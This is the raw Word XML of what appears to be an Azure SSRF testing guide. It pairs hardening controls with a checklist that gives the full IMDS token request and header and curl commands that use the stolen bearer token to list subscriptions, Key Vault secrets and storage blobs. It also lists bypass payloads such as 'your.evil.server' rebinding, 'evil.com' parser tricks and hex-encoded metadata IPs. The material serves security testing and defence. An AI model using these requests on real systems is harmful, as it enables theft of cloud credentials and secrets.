            <w:r w:rsidRPr="00F37A03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2BA3FF6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F37A03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E348CDF" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F37A03">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="33391EBA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20F3" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>SSRF → IMDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204CE28C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Steal Managed Identity token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="409BC749" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Access Vault, Graph API, Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="1F8FEBEF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8BEE" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:lastRenderedPageBreak/>
              <w:t>SSRF via Open Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4670F271" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Redirect attacker-controlled URL to IMDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7611AFBD" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Proxy to 169.254.169.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="4554C7C1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F67B" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>SSRF via Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FAEB18A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>App unpacks attacker-controlled object with URL fetch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BDDC17E" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Full RCE or internal HTTP access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="248307DA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0DCE" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Proxy misconfig (e.g., nginx, appgateway)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B9E77BF" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Redirect to IMDS via X-Forwarded-Host trick</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7964A10A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Confused proxy SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51D0FC8D" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="59759C91" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="10043D5F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Suggested Hardening Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB31F0F" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Block access to IMDS from app code</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> unless needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBB491C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Assigned Managed Identities</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> with minimal scopes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF075A9" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Monitor apps with public input that can fetch remote URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEC0F8" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">Apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NSGs or Azure Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> rules blocking 169.254.169.254 from untrusted workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9DA523" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> in web apps where applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D50EA6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="0F9FD578" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CD03EF" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="311CA92A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Azure SSRF Testing Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339272B9" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>1. Check for SSRF in Web Inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447F21C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Image uploaders / fetchers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271FD9EA" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Webhook URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF7B343" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>PDF generators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4CF3B" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>URL preview/metadata fetch tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEE5A0" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>API endpoints that accept user-controlled URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ABE0C6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="79DAE7DD" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> 2. Attempt Metadata Service Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE049E" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>Try accessing the Azure Instance Metadata Service (IMDS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7503FAA3" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B325DE" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required Header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C089CB" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>Metadata: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107309EA" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="28500F54" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> 3. Verify Token Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268E1A2" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>A successful SSRF may return:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4CEB5" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499ABAD6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  "access_token": "eyJ0eXAiOiJKV1QiLCJh...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFE8FB7" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  "expires_in": "3599",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DC2F80" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  "token_type": "Bearer",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61174167" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  "resource": "https://management.azure.com/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434E8A7" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE3F83" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>Use this token to access Azure services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F674D32" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:lastRenderedPageBreak/>
        <w:t>curl -H "Authorization: Bearer &lt;TOKEN&gt;" https://management.azure.com/subscriptions?api-version=2020-01-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19095161" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="1583C464" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> 4. Test Common SSRF Bypass Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B11F51C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="006F38E7" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4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598"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="1C28DD69" w14:textId="77777777" w:rsidTr="00EB1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529A1" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F37A03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A4B0C70" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F37A03">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="5556329D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2CBE0" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>DNS rebinding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A143C32" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>http://your.evil.server → resolves to 169.254.169.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="08F0CF2A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92D1" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Obfuscated IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="506D3756" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>http://0xA9FEA9FE or http://2130706433</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="3FD0BA76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2779" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Localhost aliases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="001EFCB1" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>http://localhost, http://127.0.0.1, http://[::1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="16EE290B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287F" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Headers overwrite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79B45A03" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Add Host: 169.254.169.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="29F5A218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3987" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Redirect chaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C10C229" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Use an open redirect to forward to IMDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="4C12D117" w14:textId="77777777" w:rsidTr="00EB1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4EA8" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>Path confusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09CE5801" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00F37A03">
              <w:t>http://169.254.169.254@evil.com (trick parsers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08EC3813" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="692FE6C6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> 5. Privilege Escalation Paths via Token Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB52AC5" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Access Azure Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36B689" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>curl -H "Authorization: Bearer &lt;token&gt;" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00058010" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">     https://&lt;vault-name&gt;.vault.azure.net/secrets?api-version=7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0E9491" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Access Storage Blobs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406665B4" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>https://&lt;storage&gt;.blob.core.windows.net/&lt;container&gt;?restype=container&amp;comp=list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335888BA" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Enumerate Resource Groups / VMs / App Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66821558" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="2779BFA4" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="04B9B4EC" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
